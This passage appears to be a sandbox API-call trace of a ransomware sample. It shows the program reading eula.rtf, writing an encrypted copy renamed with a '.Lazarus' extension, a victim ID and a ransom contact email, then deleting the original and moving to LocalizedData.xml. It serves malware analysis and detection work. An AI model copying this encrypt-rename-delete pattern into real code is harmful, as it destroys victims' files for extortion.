[0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.246] AreFileApisANSI () returned 1 [0061.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0061.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0061.247] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5)) returned 1 [0061.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.247] AreFileApisANSI () returned 1 [0061.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.247] GetLastError () returned 0x0 [0061.247] SetLastError (dwErrCode=0x0) [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0061.247] GetLastError () returned 0x0 [0061.247] SetLastError (dwErrCode=0x0) [0061.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0061.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0061.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0061.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.248] AreFileApisANSI () returned 1 [0061.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0061.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0061.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0061.248] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.250] GetFileType (hFile=0x428) returned 0x1 [0061.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.250] AreFileApisANSI () returned 1 [0061.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x694e0 [0061.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0061.250] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.250] GetFileType (hFile=0x420) returned 0x1 [0061.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0061.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0061.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.251] GetLastError () returned 0x0 [0061.251] SetLastError (dwErrCode=0x0) [0061.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.251] GetLastError () returned 0x0 [0061.251] SetLastError (dwErrCode=0x0) [0061.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.251] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0061.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0061.253] GetLastError () returned 0x0 [0061.253] SetLastError (dwErrCode=0x0) [0061.253] GetLastError () returned 0x0 [0061.253] SetLastError (dwErrCode=0x0) [0061.253] GetLastError () returned 0x0 [0061.253] SetLastError (dwErrCode=0x0) [0061.254] GetLastError () returned 0x0 [0061.254] SetLastError (dwErrCode=0x0) [0061.254] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x8a5, lpOverlapped=0x0) returned 1 [0061.254] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.255] GetLastError () returned 0x0 [0061.255] SetLastError (dwErrCode=0x0) [0061.255] GetLastError () returned 0x0 [0061.255] SetLastError (dwErrCode=0x0) [0061.255] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.255] GetLastError () returned 0x0 [0061.255] SetLastError (dwErrCode=0x0) [0061.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5) returned 0x7cf00 [0061.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0061.255] GetLastError () returned 0x0 [0061.255] SetLastError (dwErrCode=0x0) [0061.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0061.256] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x8b0, lpOverlapped=0x0) returned 1 [0061.256] GetLastError () returned 0x0 [0061.256] SetLastError (dwErrCode=0x0) [0061.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.256] GetLastError () returned 0x0 [0061.256] SetLastError (dwErrCode=0x0) [0061.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0061.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0061.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0061.256] CloseHandle (hObject=0x428) returned 1 [0061.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.257] CloseHandle (hObject=0x420) returned 1 [0061.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0061.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.257] AreFileApisANSI () returned 1 [0061.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0061.258] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.258] GetFileType (hFile=0x420) returned 0x1 [0061.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.259] GetLastError () returned 0xb7 [0061.259] SetLastError (dwErrCode=0xb7) [0061.259] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.260] CloseHandle (hObject=0x420) returned 1 [0061.260] AreFileApisANSI () returned 1 [0061.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0061.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0061.260] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.261] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.262] AreFileApisANSI () returned 1 [0061.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.263] AreFileApisANSI () returned 1 [0061.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0061.263] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.263] GetFileType (hFile=0x420) returned 0x1 [0061.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.263] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.263] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.263] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.264] CloseHandle (hObject=0x420) returned 1 [0061.264] AreFileApisANSI () returned 1 [0061.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0061.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0061.264] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.264] GetFileType (hFile=0x420) returned 0x1 [0061.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.264] CloseHandle (hObject=0x420) returned 1 [0061.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: 